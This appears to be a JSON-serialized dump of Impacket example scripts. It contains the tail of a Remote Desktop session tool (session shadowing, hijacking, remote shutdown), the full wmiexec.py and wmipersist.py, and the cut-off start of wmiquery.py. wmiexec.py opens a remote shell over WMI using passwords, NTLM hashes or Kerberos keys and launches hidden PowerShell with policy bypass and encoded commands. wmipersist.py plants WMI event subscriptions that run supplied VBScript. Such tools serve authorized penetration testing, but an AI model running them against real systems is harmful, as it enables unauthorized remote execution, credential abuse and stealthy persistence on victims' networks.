Desktop Services sessions.\n qwinsta_parser = subparsers.add_parser('qwinsta', help='Display information about Remote Desktop Services sessions.')\n qwinsta_parser.add_argument('-v', action='store_true', dest='verbose', help='Turn VERBOSE output ON')\n\n # tasklist: Display a list of currently running processes on the system.\n tasklist_parser = subparsers.add_parser('tasklist', help='Display a list of currently running processes on the system.')\n tasklist_parser.add_argument('-v', action='store_true', dest='verbose', help='Turn VERBOSE output ON')\n \n # taskkill: Terminate tasks by process id (PID) or image name\n taskkill_parser = subparsers.add_parser('taskkill', help='Terminate tasks by process id (PID) or image name.')\n taskkill_parser.add_argument('-pid', action='store', metavar=\"PID\", type=int, help='Specifies process id (PID)')\n taskkill_parser.add_argument('-name', action='store', help='Specifies process name (ImageName). Internally it will'\n 'execute tasklist to retrieve PID by ImageName.')\n\n # tscon: Attaches a user session to a remote desktop session\n tscon_parser = subparsers.add_parser('tscon', help='Attaches a user session to a remote desktop session.')\n tscon_parser.add_argument('-source', action='store', metavar=\"SessionID\", type=int, required=True, help='Source SessionId')\n tscon_parser.add_argument('-dest', action='store', metavar=\"SessionID\", type=int, required=True, help='Destination SessionId')\n tscon_parser.add_argument('-password', action='store', type=str, required=False, help='Destination Session\\'s password')\n\n # tsdiscon: Disconnects a Remote Desktop Services session\n tsdiscon_parser = subparsers.add_parser('tsdiscon', help='Disconnects a Remote Desktop Services session.')\n tsdiscon_parser.add_argument('-session', action='store', metavar=\"SessionID\", type=int, required=True, help='SessionId to disconnect')\n\n # logoff: Sign out a Remote Desktop Services session\n logoff_parser = subparsers.add_parser('logoff', help='Sign out a Remote Desktop Services session.')\n logoff_parser.add_argument('-session', action='store', metavar=\"SessionID\", type=int, required=True, help='SessionId to sign out')\n \n # shutdown: Remote shutdown\n shutdown_parser = subparsers.add_parser('shutdown', help='Remote shutdown, affects ALL sessions and logged-in users!',\n description=\"Send Remote Shutdown event. Affects ALL sessions and logged-in users!\")\n shutdown_parser_group = shutdown_parser.add_argument_group('Shutdown Flags [Multiple Choice]')\n\n shutdown_parser_group.add_argument('-logoff', action='store_true', help='Forces sessions to logoff.')\n shutdown_parser_group.add_argument('-shutdown', action='store_true', help='Shuts down the system.')\n shutdown_parser_group.add_argument('-reboot', action='store_true', help='Reboots after shutdown.')\n shutdown_parser_group.add_argument('-poweroff', action='store_true', help='Powers off after shutdown.')\n\n # msg: Send a message to Remote Desktop Services session (MSGBOX)\n msg_parser = subparsers.add_parser('msg', help='Send a message to Remote Desktop Services session (MSGBOX).')\n msg_parser.add_argument('-session', action='store', metavar=\"SessionID\", type=int, required=True, help='Receiver SessionId')\n msg_parser.add_argument('-title', action='store', metavar=\"'Your Title'\", type=str, required=False, help='Title of the MessageBox [Optional]')\n msg_parser.add_argument('-message', action='store', metavar=\"'Your Message'\", type=str, required=True, help='Contents of the MessageBox')\n\n shadow_parser = subparsers.add_parser('shadow', help='Shadow a Remote Desktop Services session.')\n shadow_parser.add_argument('-session', action='store', metavar=\"SessionID\", type=int, required=True, help='SessionId to shadow')\n shadow_parser.add_argument('-control', action='store_true', help='Request control of the session (default is view only)')\n shadow_parser.add_argument('-prompt', action='store_true', help='Request user permission (default is silent)')\n shadow_parser.add_argument('-file', type=str, help='Save invitation to file', default='invite.msrcIncident')\n\n # Authentication options\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\",\n help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on '\n 'target parameters. If valid credentials cannot be found, it will use the ones specified '\n 'in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\",\n help='AES key to use for Kerberos Authentication (128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.action is None:\n parser.print_help()\n LOG.error('Too few arguments...')\n sys.exit(1)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if domain is None:\n domain = ''\n\n if options.aesKey is not None:\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n\n password = getpass(\"Password:\")\n\n tsHandler = TSHandler(username, password, domain, options)\n try:\n tsHandler.run(remoteName, options.target_ip)\n except Exception as e:\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/wmiexec.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# A similar approach to smbexec but executing commands through WMI.\n# Main advantage here is it runs under the user (has to be Admin)\n# account, not SYSTEM, plus, it doesn't generate noisy messages\n# in the event log that smbexec.py does when creating a service.\n# Drawback is it needs DCOM, hence, I have to be able to access\n# DCOM ports at the target machine.\n#\n# Author:\n# beto (@agsolino)\n#\n# Reference for:\n# DCOM\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport os\nimport cmd\nimport argparse\nimport time\nimport logging\nimport ntpath\nfrom base64 import b64encode\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version\nfrom impacket.smbconnection import SMBConnection, SMB_DIALECT, SMB2_DIALECT_002, SMB2_DIALECT_21\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSION\nfrom impacket.dcerpc.v5.dcom import wmi\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.krb5.keytab import Keytab\n\nOUTPUT_FILENAME = '__' + str(time.time())\nCODEC = sys.stdout.encoding\n\n\nclass WMIEXEC:\n def __init__(self, command='', username='', password='', domain='', hashes=None, aesKey=None, share=None,\n noOutput=False, doKerberos=False, kdcHost=None, remoteHost=\"\", shell_type=None):\n self.__command = command\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = aesKey\n self.__share = share\n self.__noOutput = noOutput\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__remoteHost = remoteHost\n self.__shell_type = shell_type\n self.shell = None\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n def run(self, addr, silentCommand=False):\n if self.__noOutput is False and silentCommand is False:\n smbConnection = SMBConnection(addr, self.__remoteHost)\n if self.__doKerberos is False:\n smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n else:\n smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)\n\n dialect = smbConnection.getDialect()\n if dialect == SMB_DIALECT:\n logging.info(\"SMBv1 dialect used\")\n elif dialect == SMB2_DIALECT_002:\n logging.info(\"SMBv2.0 dialect used\")\n elif dialect == SMB2_DIALECT_21:\n logging.info(\"SMBv2.1 dialect used\")\n else:\n logging.info(\"SMBv3.0 dialect used\")\n else:\n smbConnection = None\n\n dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,\n self.__aesKey, oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost, remoteHost=self.__remoteHost)\n try:\n iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)\n iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)\n iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)\n iWbemLevel1Login.RemRelease()\n\n win32Process, _ = iWbemServices.GetObject('Win32_Process')\n\n self.shell = RemoteShell(self.__share, win32Process, smbConnection, self.__shell_type, silentCommand)\n if self.__command != ' ':\n self.shell.onecmd(self.__command)\n else:\n self.shell.cmdloop()\n except (Exception, KeyboardInterrupt) as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n if smbConnection is not None:\n smbConnection.logoff()\n dcom.disconnect()\n sys.stdout.flush()\n sys.exit(1)\n\n if smbConnection is not None:\n smbConnection.logoff()\n dcom.disconnect()\n\n\nclass RemoteShell(cmd.Cmd):\n def __init__(self, share, win32Process, smbConnection, shell_type, silentCommand=False):\n cmd.Cmd.__init__(self)\n self.__share = share\n self.__output = '\\\\' + OUTPUT_FILENAME\n self.__outputBuffer = str('')\n self.__shell = 'cmd.exe /Q /c '\n self.__shell_type = shell_type\n self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc '\n self.__win32Process = win32Process\n self.__transferClient = smbConnection\n self.__silentCommand = silentCommand\n self.__pwd = str('C:\\\\')\n self.__noOutput = False\n self.intro = '[!] Launching semi-interactive shell - Careful what you execute\\n[!] Press help for extra shell commands'\n\n # We don't wanna deal with timeouts from now on.\n if self.__transferClient is not None:\n self.__transferClient.setTimeout(100000)\n self.do_cd('\\\\')\n else:\n self.__noOutput = True\n\n # If the user wants to just execute a command without cmd.exe, set raw command and set no output\n if self.__silentCommand is True:\n self.__shell = ''\n\n def do_shell(self, s):\n os.system(s)\n\n def do_help(self, line):\n print(\"\"\"\n lcd {path} - changes the current local directory to {path}\n exit - terminates the server process (and this session)\n lput {src_file, dst_path} - uploads a local file to the dst_path (dst_path = default current directory)\n lget {file} - downloads pathname to the current local dir\n ! {cmd} - executes a local shell cmd\n\"\"\")\n\n def do_lcd(self, s):\n if s == '':\n print(os.getcwd())\n else:\n try:\n os.chdir(s)\n except Exception as e:\n logging.error(str(e))\n\n def do_lget(self, src_path):\n\n try:\n import ntpath\n newPath = ntpath.normpath(ntpath.join(self.__pwd, src_path))\n drive, tail = ntpath.splitdrive(newPath)\n filename = ntpath.basename(tail)\n fh = open(filename, 'wb')\n logging.info(\"Downloading %s\\\\%s\" % (drive, tail))\n self.__transferClient.getFile(drive[:-1] + '$', tail, fh.write)\n fh.close()\n\n except Exception as e:\n logging.error(str(e))\n\n if os.path.exists(filename):\n os.remove(filename)\n\n def do_lput(self, s):\n try:\n params = s.split(' ')\n if len(params) > 1:\n src_path = params[0]\n dst_path = params[1]\n elif len(params) == 1:\n src_path = params[0]\n dst_path = ''\n\n src_file = os.path.basename(src_path)\n fh = open(src_path, 'rb')\n dst_path = dst_path.replace('/', '\\\\')\n import ntpath\n pathname = ntpath.join(ntpath.join(self.__pwd, dst_path), src_file)\n drive, tail = ntpath.splitdrive(pathname)\n logging.info(\"Uploading %s to %s\" % (src_file, pathname))\n self.__transferClient.putFile(drive[:-1] + '$', tail, fh.read)\n fh.close()\n except Exception as e:\n logging.critical(str(e))\n pass\n\n def do_exit(self, s):\n return True\n\n def do_EOF(self, s):\n print()\n return self.do_exit(s)\n\n def emptyline(self):\n return False\n\n def do_cd(self, s):\n self.execute_remote('cd ' + s)\n if len(self.__outputBuffer.strip('\\r\\n')) > 0:\n print(self.__outputBuffer)\n self.__outputBuffer = ''\n else:\n self.__pwd = ntpath.normpath(ntpath.join(self.__pwd, s))\n self.execute_remote('cd ')\n self.__pwd = self.__outputBuffer.strip('\\r\\n')\n self.prompt = (self.__pwd + '>')\n if self.__shell_type == 'powershell':\n self.prompt = 'PS ' + self.prompt + ' '\n self.__outputBuffer = ''\n\n def default(self, line):\n # Let's try to guess if the user is trying to change drive\n if len(line) == 2 and line[1] == ':':\n # Execute the command and see if the drive is valid\n self.execute_remote(line)\n if len(self.__outputBuffer.strip('\\r\\n')) > 0:\n # Something went wrong\n print(self.__outputBuffer)\n self.__outputBuffer = ''\n else:\n # Drive valid, now we should get the current path\n self.__pwd = line\n self.execute_remote('cd ')\n self.__pwd = self.__outputBuffer.strip('\\r\\n')\n self.prompt = (self.__pwd + '>')\n self.__outputBuffer = ''\n else:\n if line != '':\n self.send_data(line)\n\n def get_output(self):\n def output_callback(data):\n try:\n self.__outputBuffer += data.decode(CODEC)\n except UnicodeDecodeError:\n logging.error('Decoding error detected, consider running chcp.com at the target,\\nmap the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings\\nand then execute wmiexec.py '\n 'again with -codec and the corresponding codec')\n self.__outputBuffer += data.decode(CODEC, errors='replace')\n\n if self.__noOutput is True:\n self.__outputBuffer = ''\n return\n\n while True:\n try:\n self.__transferClient.getFile(self.__share, self.__output, output_callback)\n break\n except Exception as e:\n if str(e).find('STATUS_SHARING_VIOLATION') >= 0:\n # Output not finished, let's wait\n time.sleep(1)\n pass\n elif str(e).find('Broken') >= 0:\n # The SMB Connection might have timed out, let's try reconnecting\n logging.debug('Connection broken, trying to recreate it')\n self.__transferClient.reconnect()\n return self.get_output()\n self.__transferClient.deleteFile(self.__share, self.__output)\n\n def execute_remote(self, data, shell_type='cmd'):\n if shell_type == 'powershell':\n data = '$ProgressPreference=\"SilentlyContinue\";' + data\n data = self.__pwsh + b64encode(data.encode('utf-16le')).decode()\n\n command = self.__shell + data\n\n if self.__noOutput is False:\n command += ' 1> ' + '\\\\\\\\127.0.0.1\\\\%s' % self.__share + self.__output + ' 2>&1'\n response = self.__win32Process.Create(command, self.__pwd, None)\n if self.__noOutput is False:\n self.get_output()\n else:\n response.printInformation() # print ProcessId and ReturnValue\n\n def send_data(self, data):\n self.execute_remote(data, self.__shell_type)\n print(self.__outputBuffer)\n self.__outputBuffer = ''\n\n\nclass AuthFileSyntaxError(Exception):\n '''raised by load_smbclient_auth_file if it encounters a syntax error\n while loading the smbclient-style authentication file.'''\n\n def __init__(self, path, lineno, reason):\n self.path = path\n self.lineno = lineno\n self.reason = reason\n\n def __str__(self):\n return 'Syntax error in auth file %s line %d: %s' % (\n self.path, self.lineno, self.reason)\n\n\ndef load_smbclient_auth_file(path):\n '''Load credentials from an smbclient-style authentication file (used by\n smbclient, mount.cifs and others). returns (domain, username, password)\n or raises AuthFileSyntaxError or any I/O exceptions.'''\n\n lineno = 0\n domain = None\n username = None\n password = None\n for line in open(path):\n lineno += 1\n\n line = line.strip()\n\n if line.startswith('#') or line == '':\n continue\n\n parts = line.split('=', 1)\n if len(parts) != 2:\n raise AuthFileSyntaxError(path, lineno, 'No \"=\" present in line')\n\n (k, v) = (parts[0].strip(), parts[1].strip())\n\n if k == 'username':\n username = v\n elif k == 'password':\n password = v\n elif k == 'domain':\n domain = v\n else:\n raise AuthFileSyntaxError(path, lineno, 'Unknown option %s' % repr(k))\n\n return (domain, username, password)\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Executes a semi-interactive shell using Windows \"\n \"Management Instrumentation.\")\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-share', action='store', default='ADMIN$', help='share where the output will be grabbed from '\n '(default ADMIN$)')\n parser.add_argument('-nooutput', action='store_true', default=False, help='whether or not to print the output '\n '(no SMB connection created)')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-silentcommand', action='store_true', default=False,\n help='does not execute cmd.exe to run given command (no output)')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\\'s output (default '\n '\"%s\"). If errors are detected, run chcp.com at the target, '\n 'map the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py '\n 'again with -codec and the corresponding codec ' % CODEC)\n parser.add_argument('-shell-type', action='store', default='cmd', choices=['cmd', 'powershell'],\n help='choose a command processor for the semi-interactive shell')\n parser.add_argument('-com-version', action='store', metavar=\"MAJOR_VERSION:MINOR_VERSION\",\n help='DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7')\n parser.add_argument('command', nargs='*', default=' ', help='command to execute at the target. If empty it will '\n 'launch a semi-interactive shell')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\",\n help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-A', action=\"store\", metavar=\"authfile\", help=\"smbclient/mount.cifs-style authentication file. \"\n \"See smbclient man page's -A option.\")\n group.add_argument('-keytab', action=\"store\", help='Read keys for SPN from keytab file')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.codec is not None:\n CODEC = options.codec\n else:\n if CODEC is None:\n CODEC = 'utf-8'\n\n if ' '.join(options.command) == ' ' and options.nooutput is True:\n logging.error(\"-nooutput switch and interactive shell not supported\")\n sys.exit(1)\n if options.silentcommand and options.command == ' ':\n logging.error(\"-silentcommand switch and interactive shell not supported\")\n sys.exit(1)\n\n if options.com_version is not None:\n try:\n major_version, minor_version = options.com_version.split('.')\n COMVERSION.set_default_version(int(major_version), int(minor_version))\n except Exception:\n logging.error(\"Wrong COMVERSION format, use dot separated integers e.g. \\\"5.7\\\"\")\n sys.exit(1)\n\n domain, username, password, address = parse_target(options.target)\n\n try:\n if options.A is not None:\n (domain, username, password) = load_smbclient_auth_file(options.A)\n logging.debug('loaded smbclient auth file: domain=%s, username=%s, password=%s' % (\n repr(domain), repr(username), repr(password)))\n\n if options.target_ip is None:\n options.target_ip = address\n\n if domain is None:\n domain = ''\n\n if options.keytab is not None:\n Keytab.loadKeysFromKeytab(options.keytab, username, domain, options)\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n executer = WMIEXEC(' '.join(options.command), username, password, domain, options.hashes, options.aesKey,\n options.share, options.nooutput, options.k, options.dc_ip, options.target_ip, options.shell_type)\n executer.run(address, options.silentcommand)\n except KeyboardInterrupt as e:\n logging.error(str(e))\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n\n traceback.print_exc()\n logging.error(str(e))\n sys.exit(1)\n\n sys.exit(0)\n" }, { "path": "examples/wmipersist.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script creates/removes a WMI Event Consumer/Filter and link\n# between both to execute Visual Basic based on the WQL filter\n# or timer specified.\n#\n# Example:\n#\n# write a file toexec.vbs the following:\n#\t Dim objFS, objFile\n#\t Set objFS = CreateObject(\"Scripting.FileSystemObject\")\n#\t Set objFile = objFS.OpenTextFile(\"C:\\ASEC.log\", 8, true)\n#\t objFile.WriteLine \"Hey There!\"\n#\t objFile.Close\n#\n# then execute this script this way, VBS will be triggered once\n# somebody opens calc.exe:\n#\n# wmipersist.py domain.net/adminuser:mypwd@targetHost install -name ASEC\n# -vbs toexec.vbs\n# -filter 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance\n# ISA \"Win32_Process\" AND TargetInstance.Name = \"calc.exe\"'\n#\n# or, if you just want to execute the VBS every XXX milliseconds:\n#\n# wmipersist.py domain.net/adminuser:mypwd@targetHost install -name ASEC\n# -vbs toexec.vbs -timer XXX\n#\n# to remove the event:\n#\t wmipersist.py domain.net/adminuser:mypwd@targetHost remove -name ASEC\n#\n# if you don't specify the password, it will be asked by the script.\n# domain is optional.\n#\n# Author:\n# beto (@agsolino)\n#\n# Reference for:\n# DCOM/WMI\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport argparse\nimport logging\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSION\nfrom impacket.dcerpc.v5.dcom import wmi\nfrom impacket.dcerpc.v5.dtypes import NULL\n\n\nclass WMIPERSISTENCE:\n def __init__(self, username='', password='', domain='', options=None):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__options = options\n self.__lmhash = ''\n self.__nthash = ''\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n\n @staticmethod\n def checkError(banner, resp):\n call_status = resp.GetCallStatus(0) & 0xffffffff # interpret as unsigned\n if call_status != 0:\n from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS\n try:\n error_name = WBEMSTATUS.enumItems(call_status).name\n except ValueError:\n error_name = 'Unknown'\n logging.error('%s - ERROR: %s (0x%08x)' % (banner, error_name, call_status))\n else:\n logging.info('%s - OK' % banner)\n\n def run(self, addr):\n dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,\n options.aesKey, oxidResolver=False, doKerberos=options.k, kdcHost=options.dc_ip)\n\n iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)\n iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)\n iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL)\n iWbemLevel1Login.RemRelease()\n\n if self.__options.action.upper() == 'REMOVE':\n self.checkError('Removing ActiveScriptEventConsumer %s' % self.__options.name,\n iWbemServices.DeleteInstance('ActiveScriptEventConsumer.Name=\"%s\"' % self.__options.name))\n\n self.checkError('Removing EventFilter EF_%s' % self.__options.name,\n iWbemServices.DeleteInstance('__EventFilter.Name=\"EF_%s\"' % self.__options.name))\n\n self.checkError('Removing IntervalTimerInstruction TI_%s' % self.__options.name,\n iWbemServices.DeleteInstance(\n '__IntervalTimerInstruction.TimerId=\"TI_%s\"' % self.__options.name))\n\n self.checkError('Removing FilterToConsumerBinding %s' % self.__options.name,\n iWbemServices.DeleteInstance(\n r'__FilterToConsumerBinding.Consumer=\"ActiveScriptEventConsumer.Name=\\\"%s\\\"\",'\n r'Filter=\"__EventFilter.Name=\\\"EF_%s\\\"\"' % (\n self.__options.name, self.__options.name)))\n else:\n activeScript, _ = iWbemServices.GetObject('ActiveScriptEventConsumer')\n activeScript = activeScript.SpawnInstance()\n activeScript.Name = self.__options.name\n activeScript.ScriptingEngine = 'VBScript'\n activeScript.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]\n activeScript.ScriptText = options.vbs.read()\n self.checkError('Adding ActiveScriptEventConsumer %s'% self.__options.name, \n iWbemServices.PutInstance(activeScript.marshalMe()))\n \n if options.filter is not None:\n eventFilter, _ = iWbemServices.GetObject('__EventFilter')\n eventFilter = eventFilter.SpawnInstance()\n eventFilter.Name = 'EF_%s' % self.__options.name\n eventFilter.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]\n eventFilter.Query = options.filter\n eventFilter.QueryLanguage = 'WQL'\n eventFilter.EventNamespace = r'root\\cimv2'\n self.checkError('Adding EventFilter EF_%s' % self.__options.name,\n iWbemServices.PutInstance(eventFilter.marshalMe()))\n\n else:\n wmiTimer, _ = iWbemServices.GetObject('__IntervalTimerInstruction')\n wmiTimer = wmiTimer.SpawnInstance()\n wmiTimer.TimerId = 'TI_%s' % self.__options.name\n wmiTimer.IntervalBetweenEvents = int(self.__options.timer)\n #wmiTimer.SkipIfPassed = False\n self.checkError('Adding IntervalTimerInstruction',\n iWbemServices.PutInstance(wmiTimer.marshalMe()))\n\n eventFilter,_ = iWbemServices.GetObject('__EventFilter')\n eventFilter = eventFilter.SpawnInstance()\n eventFilter.Name = 'EF_%s' % self.__options.name\n eventFilter.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]\n eventFilter.Query = 'select * from __TimerEvent where TimerID = \"TI_%s\" ' % self.__options.name\n eventFilter.QueryLanguage = 'WQL'\n eventFilter.EventNamespace = r'root\\subscription'\n self.checkError('Adding EventFilter EF_%s' % self.__options.name,\n iWbemServices.PutInstance(eventFilter.marshalMe()))\n\n filterBinding, _ = iWbemServices.GetObject('__FilterToConsumerBinding')\n filterBinding = filterBinding.SpawnInstance()\n filterBinding.Filter = '__EventFilter.Name=\"EF_%s\"' % self.__options.name\n filterBinding.Consumer = 'ActiveScriptEventConsumer.Name=\"%s\"' % self.__options.name\n filterBinding.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]\n\n self.checkError('Adding FilterToConsumerBinding',\n iWbemServices.PutInstance(filterBinding.marshalMe()))\n\n dcom.disconnect()\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Creates/Removes a WMI Event Consumer/Filter and \"\n \"link between both to execute Visual Basic based on the WQL filter or timer specified.\")\n\n parser.add_argument('target', action='store', help='[domain/][username[:password]@]
')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-com-version', action='store', metavar = \"MAJOR_VERSION:MINOR_VERSION\", help='DCOM version, '\n 'format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7')\n subparsers = parser.add_subparsers(help='actions', dest='action')\n\n # A start command\n install_parser = subparsers.add_parser('install', help='installs the wmi event consumer/filter')\n install_parser.add_argument('-name', action='store', required=True, help='event name')\n install_parser.add_argument('-vbs', type=argparse.FileType('r'), required=True, help='VBS filename containing the '\n 'script you want to run')\n install_parser.add_argument('-filter', action='store', required=False, help='the WQL filter string that will trigger'\n ' the script')\n install_parser.add_argument('-timer', action='store', required=False, help='the amount of milliseconds after the'\n ' script will be triggered')\n\n # A stop command\n remove_parser = subparsers.add_parser('remove', help='removes the wmi event consumer/filter')\n remove_parser.add_argument('-name', action='store', required=True, help='event name')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n \n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.com_version is not None:\n try:\n major_version, minor_version = options.com_version.split('.')\n COMVERSION.set_default_version(int(major_version), int(minor_version))\n except Exception:\n logging.error(\"Wrong COMVERSION format, use dot separated integers e.g. \\\"5.7\\\"\")\n sys.exit(1)\n\n if options.action.upper() == 'INSTALL':\n if (options.filter is None and options.timer is None) or (options.filter is not None and options.timer is not None):\n logging.error(\"You have to either specify -filter or -timer (and not both)\")\n sys.exit(1)\n\n domain, username, password, address = parse_target(options.target)\n\n try:\n if domain is None:\n domain = ''\n\n if options.aesKey is not None:\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n executer = WMIPERSISTENCE(username, password, domain, options)\n executer.run(address)\n except (Exception, KeyboardInterrupt) as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n sys.exit(0)\n" }, { "path": "examples/wmiquery.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-WMI] example. It allows to issue WQL queries and\n# get description of the objects.\n#\n# e.g.: select name from win32_account\n# e.g.: describe win32_process\n# \n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# DCOM\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport sys\nimport os\nimport logging\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version\nfrom 